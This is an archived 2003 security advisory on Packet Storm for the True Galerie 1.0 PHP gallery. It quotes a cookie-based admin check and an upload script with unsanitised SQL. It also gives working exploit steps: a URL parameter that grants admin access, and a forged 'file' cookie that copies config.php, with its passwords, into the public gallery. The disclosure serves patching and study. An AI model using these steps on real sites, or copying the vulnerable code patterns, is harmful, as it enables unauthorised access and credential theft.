what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

truegalerie.txt

truegalerie.txt
Posted Apr 27, 2003
Authored by Frog Man | Site frog-man.org

A problem exists in True Galerie v1.0 that allows a remote attacker to obtain administrative access to this utility due to misuse of cookies.

tags | exploit, remote
SHA-256 | d60704ec2fd8a3caefc2462af52a5c5019ab052febae606e69424fa837d5ec1a

truegalerie.txt

Change Mirror Download

Informations :
°°°°°°°°°°°°°°
Language : PHP
Website : http://www.truelogik.net
Version : 1.0
Problems :
- Admin Access
- File Copy


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
verif_admin.php, check_admin.php :

------------------------------------------------------------------------

<?
if(isset($connect)) {
if($connect=="$passadmin") setcookie("loggedin","ok");
if($connect=="no") setcookie("loggedin");
Header("Location: ".$PHP_SELF);
}

$ok = ($loggedin!="");

if($ok) {
echo "<center>";
echo "<table>";
echo "<tr><td align='center'><a
href='?connect=no'>DECONNEXION</a></td></tr>";
echo "</table>";
echo "</center>";
}
else {
echo "<center><form method='post'>";
echo "<table>";
echo "<tr><td align='center'>CONNEXION</td></tr>";
echo "<tr><td align='center'>Password : admin</td></tr>";
echo "<tr><td><input type='password' name='connect'></td></tr>";
echo "<tr><td><input type='submit' value='Login'></td></tr>";
echo "</table>";
echo "</form></center>";
}
?>

------------------------------------------------------------------------




upload.php :

----------------------------------------------------------------------
[...]
$userip = $REMOTE_ADDR;
$pseudo = $_POST['pseudo'];
$message = $_POST['message'];
$email = $_POST['email'];
[...]
if((!$pseudo) || (!$message) || (!$file)) {
[...]
exit;
}

if(!ereg('^[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+'.
'@'.
'[-!#$%&\'*+\\/0-9=?A-Z^_`a-z{|}~]+\.'.
'[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+$',
$email))
{
[...]
exit();
}

[...]

if ($file_size >= $MAX_FILE_SIZE)
{
[...]
exit();
}

if($HTTP_POST_FILES['file']['type']=="image/pjpeg") {
$ext="jpg";
}
elseif($HTTP_POST_FILES['file']['type']=="image/gif") {
$ext="gif";
}
if($HTTP_POST_FILES['file']['type']=="image/pjpeg"|$HTTP_POST_FILES['file']['type']=="image/gif")
{

$date = time();

$query = "INSERT INTO $tablegalerie
(cat_id,pseudo,email,url,message,date,clicks,img,userip)
VALUES('$cat_id','$pseudo','$email','$url','$message','$date','','','$userip')";

mysql_query($query);

$id=mysql_insert_id();
$random_name = makeRandomName();

$dest_file="./$folder/$random_name.$ext";

$query = "UPDATE $tablegalerie SET img='$dest_file' WHERE id='$id'";
mysql_query($query);

$res_copy=@copy($file,$dest_file);
@move_uploaded_file($file,$dest_file);
----------------------------------------------------------------------



Exploits :
°°°°°°°°°°
- To be admin :
http://[target]/admin.php?loggedin=1


- To read config.php (with admin password, DB password,...) :
1) Set a cookie named "file" and with the value "config.php" on
http://[target]/form.php
2) Fill the form on this form.php page (the image have to be a real image,
.gif or .jpg !)
3) Submit the form
4) Go on the index, look at your file (the last registered image)
5) Read it : it's config.php.


Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .


More Details In French :
°°°°°°°°°°°°°°°°°°°°°°°°
http://www.frog-man.org/tutos/TrueGalerie.txt




frog-m@n







_________________________________________________________________
Utilisez votre MSN Messenger via votre GSM !
http://www.fr.msn.be/gsm/servicesms/messengerparsms

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close